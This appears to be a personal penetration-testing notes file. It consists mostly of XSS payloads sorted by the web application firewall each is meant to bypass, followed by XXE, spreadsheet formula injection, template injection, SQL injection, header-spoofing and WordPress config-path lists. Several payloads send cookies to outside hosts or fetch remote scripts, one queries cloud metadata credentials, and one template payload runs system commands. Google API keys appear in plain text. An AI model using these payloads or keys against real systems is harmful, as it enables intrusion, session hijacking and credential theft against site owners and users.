XSS_Notes

EICARdropper

https://thecyberpunker.com/blog/xss-payloads/

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

.*\.doit\.com$

https://translation.googleapis.com/language/translate/v2?key=AIzaSyBdJ88HN7LTGk1
2X5whfaVv8a5ozTEMP_k&target=language

https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyC5Lai
ovNX0mzDrDlOoLEKWCH2EWOSQohg

--------------------------------------------------------------------------------------------------------------
----------------------------

Most Important XSS Payloads for WAF Bypass

--------------------------------------------------------------------------------------------------------------
----------------------------

Test<a href=javascript:alert(1)>click<a %00


src=\"&Tab;javascript:prompt(document.cookie)&Tab;\"%00onclick=alert(1)> fooo

ASP.NET payloads, by @shrekysec

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f

"></SCRIPT>--
!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%27}};">});});})]--

Bypass Filter JavaScript source code

--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(100, 111, 99, 117, 109, 101, 110,


116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<button onClick={() => router.push("javascript:(alert)(3)")}>Click</button>

i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz

<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>

<</div>script</div>>confirm()<</div>/script</div>>

<svg/onload=window["al"+"ert"]`1337`>

<img src="image.png" usermap="#themap" width="99" height="99"><map


name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>

<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

<inpuT autofocus oNFocus="setTimeout(function() {


/*\*/top['al'+'\u0065'+'rt'](document.domain)/*\*/ }, 5000);"></inpuT%3E;>

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.coo
kie)%27>

<div
onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">

<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>

<svg/onload=window[“al”+”ert”]`1337`>

<option><style></option></select><img src=x onerror=alert(1)></style>

<Svg Only=1 OnLoad=confirm(1)>

<input/onclick=alert(1)>

{{constructor.constructor('alert(document.cookie)')()}}
<image src/onerror=alert("Contact_Name")>

javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click


me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")

<a href=\"javascript:alert(document.domain)\" onClick=\"var a =\"}, var a=5;


prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>

<A href=javascript:alert(1)>asd

<script>alert()<\/script>

"/><img src=u onerror="alert(document.domain)"<

<details ontoggle=alert(1)>

<a href="data:text/html,<script>alert(1)</script>">Click Here</a>

<a target="_blank" href="mailto:bar"onclick="alert(1)"<script>alert(1)</script>


onhower=alert(2)>Safe</a>

<p><a href="mailto:<svg/onload="alert(1)"//@x"><svg/onload="alert(1)"//@x</a></p>

<a target="_blank"
href="data:text/URI,javascript:alert(window.opener.document.cookie);">test</a>

<svg/onload=alert(/1/)>
<svg/on<script>load=prompt(document.domain);>”/>

<script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’
file:///etc/hosts’);x.send();</script>

<noscript>&amp;lt;p title=” &lt;/noscript&gt;&lt;style onload=


alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;}
&lt;/style&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;onclick=alert(1)">Click
me</a>

<script>history.pushState(0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert(document.domain)”>

<body onload="javascript:location.replace('\x2fportal\x2fc');">

--------------------------------------------------------------------------------------------------------------
----------------------------

Akamai Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

<svg><circle><set onbegin=prompt(1) attributename=fill>

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`

<x onauxclick=import('//1152848220/')>click

<x onauxclick=a=alert,a(domain)>click

<x onauxclick=import('//xss/')>click

\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss

{{constructor.constructor(alert`1`)()}}

javascript:new%20Function`al\ert\`1\``;

https://twitter.com/xhzeem/status/1378316651431612422

https://twitter.com/xhzeem/status/1377992310974218245

<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-
labs.net/xss/xss.js'</script> -https://portswigger.net/web-security/cross-site-
scripting/cheat-sheet

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hacke
rone.com/stealthy?x="+location)'>Click

--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudflare Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a
href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Ta
b;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
nt.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()>

test",prompt%0A/*HelloWorld*/(document.domain)

"onx+%00+onpointerenter%3dalert(domain)+x"

"><svg%20onload=alert%26%230000000040"1")>

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()>

<svg/on%20onload=alert(1)> (working)

<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudfront Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x


onerror=javascript:alert(`cloudfrontbypass`)//'>

">'><details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

--------------------------------------------------------------------------------------------------------------
----------------------------

Imperva Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

tarun"><x/onafterscriptexecute=confirm%26lpar;)//

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap

--------------------------------------------------------------------------------------------------------------
----------------------------

Incapsula Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;


this['src']=a">

<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]'


src=x>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>

<svg onload\r\n=$.globalEval("al"+"ert()");>

[1].map(alert) or (alert)(1)

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-
tarun/&rpar;">XXXXX</a>

[1].find(confirm)

<svg/onload=self[`aler`%2b`t`]`1`>

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E

'-[document.domain].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------

Wordfence Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%25
2fscript%253ey6uu6

<meter onmouseover="alert(1)" -@manjith27945363

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>

--------------------------------------------------------------------------------------------------------------
----------------------------

For Slack

--------------------------------------------------------------------------------------------------------------
----------------------------

'"<b oncut=alert(3)>asd</b>>

slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>

'"><img src=u onerror=alert(21)>

<script>alert(1)</script>

'"><b>ssss<a href="google.com">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="google.com">ssss</a><img/src='u'/onerror=alert()>

"'><img src=u onerror=alert(1)>

<a href="https://www.google.com">Q1</a>

[click here](https://www.google.com"+onclick=alert(1)

--------------------------------------------------------------------------------------------------------------
----------------------------

Random Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(
String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<script/src=data:,alert()>

<marquee/onstart=alert()>

<video/poster/onerror=alert()>

<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&
#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&
#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000
083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6
C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html


base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT


SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG
SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciou
scode">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">


</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>


<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

<w contenteditable id=x onfocus=alert()>

alert;pg("XSS")

<svg/onload=%26%23097lert%26lpar;1337)>

<script>for((i)in(self))eval(i)(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>

Vue JS
{{$emit.constructor`fetch(%27https://8v4y3qmogobk2g6bewqtqa83quwkk9.oastify.co
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%20document.cookie%20});`()}}

{{$emit.constructor`function b(){eval(this.responseText)};a=new
XMLHttpRequest();a.addEventListener("load", b);a.open("GET",
"//xss.report/s/sid0krypt");a.send()`()}}

{{_Vue.h.constructor('x','console.log("HI this is sid0krypt")')(this)}}

{{_Vue.h.constructor('x','console.log(x)')(this)}}

{{_Vue.h.constructor`alert(1)`()}}

{{$emit.constructor`alert(1)`()}}

${\"zjz\".toString().replace(\"j\", \"o\")}

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder;
x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\
"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

XML External Entity (XXE) Injection

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM

"https://zqtb5eufvtnznrn5l4il14ajeak28swh.oastify.com" > ]><test>&xxe</test><svg


xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"

y="40">%26xxe1;</text></svg>, <?xml version="1.0" standalone="yes"?><!DOCTYPE


test [ <!ENTITY
xxe1 SYSTEM "http://geysgbf5kz1xoad21xx9yqo11s7iv7.burpcollaborator.net" > ]><svg

xmlns="http://www.w3.org/2000/svg"><text font-size="16" x="10"


y="40">%26xxe1;</text></svg>

*********HTML Injection*********

<a href=https://www.google.com>Link</a>

<a href=https://www.google.com>SLACK</a>

<a href=https://www.google.com>Click here</a>

*********Formula Injection*********

=calc|A0!Z

@calc|A0!Z

=cmd|' /C calc'!xxx

=cmd|'/Ccalc.exe'!z

=cmd|' /C notepad'!'A1'

DDE ("cmd";"/C calc";"!A0")A0

%0A-3+3+cmd|' /C calc'!D2

*********Command Execution*********

=WEBSERVICE("http://169.254.169.254/latest/meta-data/iam/security-credentials/"),

=WEBSERVICE("http://7498qogq07az5hxtjvy2ks36ixooce03.oastify.com"),

=INFO("/etc/passwd"),

=INFO("SYSTEM"),

=INFO("OSVERSION")

*********CSRF*********
http://gursevkalra.blogspot.com/2011/12/json-csrf-with-parameter-padding.html ---- JSON Padding

https://www.geekboy.ninja/blog/tag/json-csrf/ ---- JSON Padding

Change JSON into x-www-form-urlencoded:

replace ":" with = and "," with &

ASP.NET Padding Oracle

Check the WebResource.axd URL

Web cache poisoning

Cookie language:en

Cookie language:pl 400 or 403

X-Forwarded-Host:Blueinfy

Then the same response comes back on the main request

Try in GET method

xmlrpc.php

<?xml version="1.0"?>

<methodCall>

<methodName>system.listMethods</methodName>

<params>

</params>

</methodCall>

https://kipwise.com/xmlrpc.php

<?xml version="1.0"?>
<methodCall>

<methodName>pingback.ping</methodName>

<params><param>

<value><string>http://</string></value>

</param><param><value><string>https://kipwish.com</string>

</value></param></params>

</methodCall>

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

--------------------------------------------------------------------------------------------------------------
----------------------------

WordPress

--------------------------------------------------------------------------------------------------------------
----------------------------

/.htaccess

/wp-includes/

/wp-json/

/wp-content/uploads/

/wp-json/wp/v2/users

/wp-admin

/wp-admin/admin-ajax.php

/wp-json/?rest_route=/wp/v2/users/

/wp-config.php-backup

/wp-config.php.orig

/.wp-config.php.swp

/wp-config-sample.php

/wp-config.inc

/wp-config.old
/wp-config.txt

/wp-config.php.txt

/wp-config.php.bak

/wp-config.php.old

/wp-config.php.dist

/wp-config.php.inc

/wp-config.php.swp

/wp-config.php.html

/wp-config-backup.txt

/wp-config.php.save

/wp-config.php~

/wp-config.php.original

/_wpeprivate/config.json

WordPress Elementor Website Builder plugin, versions <= 3.5.5

#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=

https://www.cvedetails.com/ ------ CVSS Score

{{5*5}}

{{7,*7}} ------ Template injection

https://autocode.com/guides/how-to-build-a-slack-bot/

x-forwarded-scheme: http

X-forwarded-host: host
X-Real-IP: 127.0.0.1

X-Client-IP: 120.0.0.1

X-Rewrite-URL: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-ProxyUser-Ip: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Original-URL: 127.0.0.1

X-Forwarded: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

True-Client-IP: 127.0.0.1

Intercom ChatBot Security Misconfiguration:

Intercom('boot', { email: '[email protected]' });

HelpCrunch ChatBot Security Misconfiguration

HelpCrunch('userAuth', {user_id: '[email protected]'});

Botframework (microsoft Azure)

WebChat.createDirectLine({userEmail:'[email protected]'});

https://calendar.google.com/calendar/b/1/r?cid=users_mail_address@company_name.com

https://gitlab.com/dee-see/notkeyhacks

' waitfor delay'0:0:15'--

Error-based

Union-based

Blind - Time and Boolean

Second order SQL Injection

Update user password='123' where username = 'xyz' and password = '123'

Update user password='123' where username ='xyz'-- and

Broken Access Control

Cryptographic Failure

Injection

Insecure Design

Security Misconfiguration

Vulnerable and Outdated Components

Authentication or Identification Failure

Software Data and Integrity Failure

Security Logging and Monitoring Failure

SSRF

<?php system(id); ?>

Firebase:

https://blog.appsecco.com/exploiting-weak-configurations-in-google-identity-platform-cbddbd0e71e3

https://hacktricks.boitatech.com.br/pentesting/pentesting-web/buckets/firebase-database

__/firebase/init.json

GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2

Host: firebase.googleapis.com

X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg

If you find SSRF, see https://www.youtube.com/watch?v=apzJiaQ6a3k

Hint: `whoami`.<burp>
